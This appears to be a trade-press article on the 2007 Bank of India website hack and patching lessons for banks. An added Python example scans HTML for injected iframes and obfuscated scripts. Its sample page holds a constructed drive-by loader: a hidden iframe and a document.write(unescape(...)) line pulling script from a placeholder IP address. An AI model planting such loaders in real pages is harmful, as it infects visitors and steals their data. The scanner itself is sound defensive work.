Bank of India Hack Can Happen Here – Be Vigilant

It’s the worst nightmare for an information security pro: Your website is hacked, and user accounts are compromised.

The announcement two weeks ago that the Bank of India website was compromised by 30 pieces of malware should be the “shot across the bow” for financial institutions here in the U.S., according to one information security researcher.

The Bank of India website was hacked on Wednesday, Aug. 29, and loaded with malware that then infected any visitor browsing from a PC with an unpatched browser. Alex Eckelberry, CEO of Sunbelt Software, a security vendor based in Tampa, FL, says researchers from the company discovered the malware embedded in the bank’s website HTML.

While how the hack actually happened is still being investigated, Eckelberry is quick to answer when asked whether this could happen to a U.S.-based bank or credit union. “Absolutely,” he says. “It happens a lot more than people actually know. The hackers look for vulnerable websites that aren’t patched properly. They don’t care what site they infect. It just was that the Bank of India fell victim to this hack.”

By his count, the malware served from Bank of India’s website included a worm, five Trojan downloaders, three rootkits and several password stealers.

Everything in the signatures and forensic evidence collected so far points to the notorious Russian Business Network (RBN) gang.

Based in St. Petersburg, RBN is called "the baddest of the bad" by VeriSign’s iDefense. The group is involved in all types of activities from spamming, phishing and denial-of-service attacks to pushing child pornography over the Internet.

The Bank of India hack is only the latest example of a legitimate Web site being compromised. “There is a lot of speculation on how that bank got hacked. It is anybody’s guess, it could have been fault of the hosting company, or at the bank,” Eckelberry says. “The real problem is very likely that the bank was not fully patched.”

The security researchers found that the hack exploited a set of Microsoft Internet Explorer vulnerabilities. “The payload was huge, so anyone going to the Bank of India site, for any reason, if their PC was not fully patched, they would become infected,” he says. The number of users who may have been infected is unknown.
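The mechanism described above, malicious content embedded in a legitimate site’s HTML that silently loads an exploit for visitors’ browsers, leaves a footprint that can be checked for. The following is an added example, not code from the article, Sunbelt Software or the bank: a small scanner that parses a page and flags the usual injection markers (hidden or zero-size iframes, script sources outside the site’s own hosts, and inline scripts that build their payload with `unescape`/`eval`/`document.write`). The sample page, the `bank.example` hostnames and the 203.0.113.x/198.51.100.x addresses are all constructed for the example and are not the real Bank of India page or the real attacker infrastructure.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (NOT the real Bank of India HTML): the site's own script
# comes from bank.example; the iframe and the unescape() loader are the injected parts.
SAMPLE_HTML = """
<html><head><title>Online Banking</title>
<script src="https://www.bank.example/js/app.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape("%3Cscript src=%22http://198.51.100.9/x.js%22%3E%3C/script%3E"))</script>
</body></html>
"""

# Hosts the page is allowed to load active content from (assumed for the example).
FIRST_PARTY = {"www.bank.example", "bank.example"}

# Calls that legitimate first-party code rarely needs but drive-by loaders almost always use.
OBFUSCATION_CALLS = re.compile(r"\b(unescape|eval|fromCharCode|document\.write)\s*\(")


class InjectionFinder(HTMLParser):
    """Collects (kind, detail) findings for injected-looking markup."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = allowed_hosts
        self.findings = []
        self._in_script = False

    def _first_party(self, url):
        host = urlparse(url).hostname
        # Relative URLs resolve to the page's own origin, so treat them as first-party.
        return host is None or host.lower() in self.allowed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src", "")
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "hidden" in style or "display:none" in style)
            if hidden or not self._first_party(src):
                self.findings.append(("iframe", src))
        elif tag == "script":
            self._in_script = True
            src = a.get("src")
            if src and not self._first_party(src):
                self.findings.append(("external-script", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so inline JS lands here.
        if self._in_script and OBFUSCATION_CALLS.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))


def scan_html(html, allowed_hosts=FIRST_PARTY):
    """Return a list of (kind, detail) tuples for suspicious iframes and scripts."""
    parser = InjectionFinder(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind:26} {detail}")
```

Run against a copy of your own production pages fetched from outside the network (the injected markup is often served only to external visitors), and diff the findings against a known-good baseline rather than trusting the allowlist alone; an attacker who can write to the web root can just as easily host the loader on a first-party path.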

For financial institutions, the key to reducing these types of infections is staying up to date with the software updates that correct these code flaws. The monthly “Patch Tuesday” updates from Microsoft may be adequate for the ordinary end user, but financial institutions need to stay on top of patching continuously, Eckelberry notes. “There are multiple issues that may have been in play here. But the point I emphasize is that the number of security incidents goes down dramatically when you patch.”

The Bank of India site was running what Eckelberry described as a hybrid of Windows and Apache software. “On the server side, you must stay up on the patching, religiously, even fanatically,” he says. Financial institutions have to realize that exploits are uncovered almost daily, and that attackers scrutinize each one as they attempt to break into servers.

Eckelberry recommends that any outward-facing server be scanned on a regular basis; a number of low-cost and free tools are available to do this. And while the Bank of India was in the process of updating its security measures to meet the increased need for scanning, Eckelberry notes that other financial institutions should heed the hard lessons. “It’s also imperative if you’re co-located, you have to know what your co-locator is doing about security and patching. They need to have at least the same level of patching you do, or better.”

The need to follow best practices for security policies, code reviews, security audits – none of this is news. But the Bank of India incident does hammer home the reality of the risks and the severity of the fallout from disaster. “This kind of event terrifies people,” Eckelberry says. “It’s the worst thing to happen to a person, thinking that if they visit their bank’s website their account information is stolen, or their money is taken. The reputation of the bank is tarnished.”

About the Author

Linda McGlasson

Managing Editor

Linda McGlasson is a seasoned writer and editor with 20 years of experience writing for corporations, business publications and newspapers. She has worked in the financial services industry for more than 12 years. Most recently Linda headed information security awareness and training and the Computer Incident Response Team for Securities Industry Automation Corporation (SIAC), a subsidiary of the NYSE Group (NYX). As part of her role she developed infosec policy, developed new awareness testing and led the company’s incident response team. In the last two years she has been involved with the Financial Services Information Sharing and Analysis Center (FS-ISAC), editing its quarterly member newsletter and identifying speakers for member meetings.
